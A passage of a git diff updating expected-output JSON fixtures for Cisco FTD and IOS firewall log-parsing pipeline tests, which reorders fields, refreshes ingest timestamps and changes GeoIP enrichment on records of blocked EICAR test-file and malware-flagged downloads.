InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", @@ -1128,13 +1092,13 @@ "packets": 0, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "1", "transport": "icmp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1172,7 +1136,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624253500Z", + "ingested": "2021-12-14T14:37:55.820199016Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1252,15 +1216,15 @@ "10.0.100.30:8000" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1304,7 +1268,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:33:12.624259Z", + "ingested": "2021-12-14T14:37:55.820199375Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json index 12dc3d022ad..6f8c8d392e1 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -22,25 +22,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:54:25.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:54:25.000Z", "ecs": { "version": "1.12.0" }, @@ -61,7 +61,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721617600Z", + "ingested": "2021-12-14T14:37:57.970772097Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -124,25 +124,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:55:02.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:55:02.000Z", "ecs": { "version": "1.12.0" }, @@ -163,7 +163,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721627200Z", + "ingested": "2021-12-14T14:37:57.970775122Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -226,25 +226,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:00:29.000Z", "file": { "name": "eicar.com" }, + "@timestamp": "2019-08-14T15:00:29.000Z", "ecs": { "version": "1.12.0" }, @@ -265,7 +265,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721633400Z", + "ingested": "2021-12-14T14:37:57.970775631Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", @@ -328,25 +328,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:01:41.000Z", "file": { "name": "eicar.com.txt" }, + "@timestamp": "2019-08-14T15:01:41.000Z", "ecs": { "version": "1.12.0" }, @@ -367,7 +367,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721639600Z", + "ingested": "2021-12-14T14:37:57.970776033Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -430,22 +430,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:28.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -453,6 +452,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:28.000Z", "ecs": { "version": "1.12.0" }, @@ -476,7 +476,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721645500Z", + "ingested": "2021-12-14T14:37:57.970776412Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -543,22 +543,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:33.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -566,6 +565,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:33.000Z", "ecs": { "version": "1.12.0" }, @@ -589,7 +589,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721651700Z", + "ingested": "2021-12-14T14:37:57.970776808Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -656,22 +656,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:09:43.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -679,6 +678,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:09:43.000Z", "ecs": { "version": "1.12.0" }, @@ -702,7 +702,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721657700Z", + "ingested": "2021-12-14T14:37:57.970777205Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -758,20 +758,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -790,22 +784,21 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:39:03.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -813,6 +806,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-16T09:39:03.000Z", "ecs": { "version": "1.12.0" }, @@ -836,7 +830,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721663800Z", + "ingested": "2021-12-14T14:37:57.970777576Z", "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", @@ -904,22 +898,21 @@ "scheme": "http", "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:40:45.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", @@ -927,6 +920,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:40:45.000Z", "ecs": { "version": "1.12.0" }, @@ -950,7 +944,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721669900Z", + "ingested": "2021-12-14T14:37:57.970777954Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", @@ -1005,20 +999,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -1036,22 +1024,21 @@ "scheme": "http", "domain": "81.2.69.144" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:42:07.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", @@ -1059,6 +1046,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:42:07.000Z", "ecs": { "version": "1.12.0" }, @@ -1082,7 +1070,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721675800Z", + "ingested": "2021-12-14T14:37:57.970778340Z", "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json index 66994577c9e..8c8efc22583 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json @@ -10,52 +10,40 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 246, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 65090, "bytes": 729, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "url": { "path": "/favicon.ico", @@ -67,15 +55,15 @@ "eyedropper-color-pick.info" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "chrome", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -118,7 +106,7 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-12-09T13:33:16.993211300Z", + "ingested": "2021-12-14T14:38:00.339668743Z", "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json index d24b33ae03d..9ca1a278169 100644 --- a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -1,6 +1,15 @@ { "expected": [ { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.197", + "224.0.0.22" + ] + }, "log": { "level": "informational", "source": { @@ -17,28 +26,10 @@ "ip": "192.168.100.197" }, "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", - "transport": "igmp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.197", - "224.0.0.22" - ] - }, "event": { "severity": 6, "sequence": 585917, - "ingested": "2021-12-09T13:33:17.492482Z", + "ingested": "2021-12-14T14:38:00.838124062Z", "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "code": "IPACCESSLOGRP", "provider": "firewall", @@ -51,6 +42,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", + "transport": "igmp", + "type": "ipv4", + "packets": 1 } }, { @@ -94,7 +94,7 @@ "event": { "severity": 6, "sequence": 585918, - "ingested": "2021-12-09T13:33:17.492489100Z", + "ingested": "2021-12-14T14:38:00.838127289Z", "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "code": "IPACCESSLOGSP", "provider": "firewall", @@ -110,6 +110,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.1", + "255.255.255.255" + ] + }, "log": { "level": "informational", "source": { @@ -126,27 +135,10 @@ "ip": "192.168.100.1" }, "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4", - "iana_number": "0", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.1", - "255.255.255.255" - ] - }, "event": { "severity": 6, "sequence": 585919, - "ingested": "2021-12-09T13:33:17.492495400Z", + "ingested": "2021-12-14T14:38:00.838127895Z", "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "code": "IPACCESSLOGNP", "provider": "firewall", @@ -159,9 +151,25 @@ "facility": "SEC", "access_list": "171" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4", + "iana_number": "0", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, "log": { "level": "informational", "source": { @@ -171,18 +179,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, @@ -191,18 +193,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 1027, @@ -210,27 +206,10 @@ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", - "transport": "tcp", - "type": "ipv6", - "packets": 9 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - ] - }, "event": { "severity": 6, "sequence": 585920, - "ingested": "2021-12-09T13:33:17.492501Z", + "ingested": "2021-12-14T14:38:00.838128418Z", "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "code": "ACCESSLOGP", "provider": "firewall", @@ -243,9 +222,27 @@ "facility": "IPV6", "access_list": "ACL-IPv6-E0/0-IN/10" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", + "transport": "tcp", + "type": "ipv6", + "packets": 9 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -264,28 +261,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663303, - "ingested": "2021-12-09T13:33:17.492506500Z", + "ingested": "2021-12-14T14:38:00.838128898Z", "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -298,6 +277,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -342,7 +330,7 @@ "event": { "severity": 6, "sequence": 1663304, - "ingested": "2021-12-09T13:33:17.492511400Z", + "ingested": "2021-12-14T14:38:00.838129384Z", "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "code": "IPACCESSLOGDP", "provider": "firewall", @@ -358,6 +346,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -376,28 +373,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { 